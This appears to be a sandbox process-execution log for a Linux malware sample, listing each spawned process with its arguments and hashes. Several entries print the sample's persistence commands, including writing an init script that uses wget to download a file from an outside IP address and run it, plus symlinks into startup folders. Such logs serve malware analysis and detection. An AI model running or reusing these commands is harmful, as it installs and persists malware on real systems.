                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:-
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/bin/ln
                                                      Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                      File size:76160 bytes
                                                      MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:-
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/bin/chmod
                                                      Arguments:chmod +x /etc/init.d/sh
                                                      File size:63864 bytes
                                                      MD5 hash:739483b900c045ae1374d6f53a86a279

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:-
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/bin/mkdir
                                                      Arguments:mkdir -p /etc/rc.d
                                                      File size:88408 bytes
                                                      MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:-
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/bin/ln
                                                      Arguments:ln -s /etc/init.d/sh /etc/rc.d/S99sh
                                                      File size:76160 bytes
                                                      MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/lib/udisks2/udisksd
                                                      Arguments:-
                                                      File size:483056 bytes
                                                      MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/sbin/dumpe2fs
                                                      Arguments:dumpe2fs -h /dev/dm-0
                                                      File size:31112 bytes
                                                      MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/lib/systemd/systemd
                                                      Arguments:-
                                                      File size:1620224 bytes
                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                      File size:22760 bytes
                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/lib/udisks2/udisksd
                                                      Arguments:-
                                                      File size:483056 bytes
                                                      MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/sbin/dumpe2fs
                                                      Arguments:dumpe2fs -h /dev/dm-0
                                                      File size:31112 bytes
                                                      MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/lib/udisks2/udisksd
                                                      Arguments:-
                                                      File size:483056 bytes
                                                      MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/sbin/dumpe2fs
                                                      Arguments:dumpe2fs -h /dev/dm-0
                                                      File size:31112 bytes
                                                      MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4